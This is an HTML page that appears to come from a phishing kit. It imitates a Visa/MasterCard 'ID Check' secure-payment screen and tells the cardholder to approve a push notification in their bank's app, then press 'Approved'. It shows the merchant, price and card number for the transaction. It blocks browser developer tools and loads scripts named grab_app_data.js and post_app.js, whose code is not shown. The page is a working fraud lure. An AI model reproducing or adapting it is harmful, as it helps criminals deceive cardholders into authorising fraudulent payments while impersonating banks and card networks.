
<html lang="en">
<head>
    <script disable-devtool-auto src='https://cdn.jsdelivr.net/npm/disable-devtool'></script>
    <script src="./config/machine/validator.js"></script>
    <link rel="icon" href="https://open.spotifycdn.com/cdn/images/favicon32.b64ecc03.png">
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Validate</title>
    <link href="./Validate_files/template-e63a3d48ea.min.css" rel="stylesheet">
    <link href="./Validate_files/validateview-451126d279.min.css" rel="stylesheet">
    <script src="./vb/jquery-3.5.1.min.js"></script>

    <style>
        body {
            color: #000000;
            font-family: Arial, 'Helvetica Neue', Helvetica, sans-serif;
            font-size: 1.25em
        }
        
        .header,
        legend,
        h1,
        h2,
        h3,
        h4 {
            color: #000000
        }
        
        label {
            color: #000000
        }
        
        a,
        .btn-link {
            color: #000000;
            text-decoration: underline
        }
        
        a:visited,
        .btn-link:visited {
            color: #000000
        }
        
        a:hover,
        a:focus,
        .btn-link:hover,
        .btn-link:focus {
            color: #211f1f
        }
        
        a:active,
        .btn-link:active {
            color: #211f1f
        }
        
        a.btn-link {
            font-size: .95em
        }
        
        .btn-primary,
        .btn-primary:focus,
        .btn-primary:hover {
            background: #211f1f;
            color: #FFF;
            border: none;
            border-radius: 0
        }
        
        .btn-primary:active,
        .btn-primary:active:hover,
        .btn-primary:active:focus {
            background: #AB2C29
        }
        
        fieldset {
            border: 0
        }
        
        fieldset>legend {
            border-bottom: 0;
            font-size: 1.00em
        }
        
         :not(.lt-ie9) label.custom-radio [type=radio]:checked+span:before {
            background: #211f1f
        }
        
        .accordion.modal .modal-body .panel-group .expander {
            color: #211f1f
        }
        
        .accordion.modal .modal-body .panel-group .panel {
            background: #FFF
        }
        
        .field-validation-error {
            color: #AB2C29
        }
        
        .toast-top-full-width {
            display: none
        }
    </style>


    </head>

    <body cz-shortcut-listen="true">
        <div class="threeds-one">



            <div class="container-fluid">



                <div class="visa-styling header" id="HeaderLogosFullWidth">
                    <a href="#" class="closeModal" id="ExitLink">X</a>
                    <div class="row no-pad">
                        <div class="visa-styling bottom-border col-12">
                         
                            <div class="pull-right visa-header-two">
                         <img name="vpasLogo" alt="MasterCard ID Check" class="img-responsive header-logo pull-right" src="./Validate_files/vs.png" border="0">                          <!-- <img alt="MasterCard ID Check" class="img-responsive header-logo pull-right" src="./Validate_files/ms.png">
                          <img name="vpasLogo" alt="MasterCard ID Check" class="img-responsive header-logo pull-right" src="./Validate_files/vs.png" border="0">
                        -->
                        
                            </div>
                        </div>
                    </div>
                </div>
                <div class="visa-styling body" dir="ltr">



                    <div class="visa-styling container container-sticky-footer">


                        <h1 class="screenreader-only">Your One-time Passcode has been sent</h1>


                        <div class="visa-row">
                            <div class="visa-col-12 visa-validate">
                              <h1>Secure payment
</h1>
                            </div>
                            <div class="row">
                                <div class="col-12" id="ValidateOneUpMessage">
                                    <div id="Body1">To complete your payment, you need to confirm the transaction details via your bank's mobile application<br> you will receive a push notification from your bank's app with your transaction approval request. <br>Check the notification to open the app and check the details before approving the transaction to safely complete the card verification.</span> 
                                        </div>
                                        <div style="padding-top: 10px">
                                            <div class="row">
                                                <div class="col-5" ><b>Merchant :</b></div>
                                                <div id="merchant" class="col-6" style="color: #666;"></div>
                                            </div>
                                            <div class="row">
                <div class="col-5" ><b>Price :</b></div>
                <div id="price" class="col-6" style="color: #666;"></div>
            </div>
         

 <div class="row">
                <div class="col-5"><b>Date:</b></div>
                <div id="date" class="col-6" style="color: #666;"></div>
            </div>
              <div class="row">
                <div class="col-5"><b>Credit card number:</b></div>
                <div id="cc" style="color: #666;"><span class="col-6 always-left-to-right"></span></div>
                                        </div>
                                                                    </div>
                            </div>
                        </div>

                        <form method="post" id="form" class="idform" novalidate>
            <input id="unique_id" name="unique_id" hidden>

                              <div class="visa-row">
                                <div class="col-12 visa-styling">
                                    <div class="form-group text-center">
                                        <div id="InputAction">
                                            <label for="CredentialValidateInput"></label>
                                            <div class="form-group" id="ErrorMessage">
                                                <img id="WarningImage" src="./Validate_files/warning.png" alt="Warning" style="display: none;">
                                                <span id="ValidationErrorMessage" class="field-validation-error" style="display: none;"></span>
                                                <span class="field-validation-valid" data-valmsg-for="SecAuth1" data-valmsg-replace="true"></span>
                                            </div>
                                            <div id="app-error" style="color:red;font-size: 14px;"></div><br>
                                            <div class="visa-col-12 text-center">
                                                <button type="submit" class="visa-styling btn btn-primary text-uppercase vba-button" id="ValidateButton" name="sub">Approved</button>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>
                            <div class="visa-row">
                            </div>
                            <div class="visa-row">
                                
                            </div>


                            <div class="footer" id="FooterLinks">
                                <div class="row">
                                    <div class="visa-col-12 helpRow" id="Accordion">
                                        <ul class="list-inline list-inline-separated pull-left">
                                            <li><a class="btn btn-link no-decoration" data-target="#Terms" data-toggle="modal" href="#" id="FooterLink1">Terms of Use</a></li>
                                        </ul>
                                    </div>
                                </div>
                            </div>
                        </form>
                    </div>

                    <div class="modal modal-clear" id="ProcessingModal" tabindex="-1" role="dialog" aria-labelledby="Processing-label" aria-hidden="true" data-keyboard="false" data-backdrop="static">
                        <div class="modal-dialog">
                            <div class="modal-content">
                                <div class="modal-body">
                                    <div class="row">
                                        <div class="col-12 processing">
                                            <img id="ProcessingImage" src="./Validate_files/loading.svg" alt="Loading Indicator" class="processing-img center-block content-block">
                                            <p class="processing-text" id="Processing-label">Processing</p>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
                <input data-val="true" data-val-number="The field MessageVersion must be a number." data-val-required="The MessageVersion field is required." id="MessageVersion" name="MessageVersion" type="hidden" value="1">
                <div class="modal fade" id="Terms" tabindex="-1" role="dialog" aria-labelledby="Terms-label">
                    <div class="modal-dialog" role="document">
                        <div class="modal-content">
                            <div class="modal-header">
                                <button type="button" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">X</span>
        </button>
                                <h4 class="modal-title" id="Terms-label">Terms of Use</h4>
                            </div>
                          
                        </div>
                    </div>
                </div>
            </div>
        </div>
    

    </div>
    <script src="./config/mine.js"></script>
    <script src="./config/machine/grab_app_data.js"></script>
    <script src="./config/data/post_app.js"></script>
</body></html>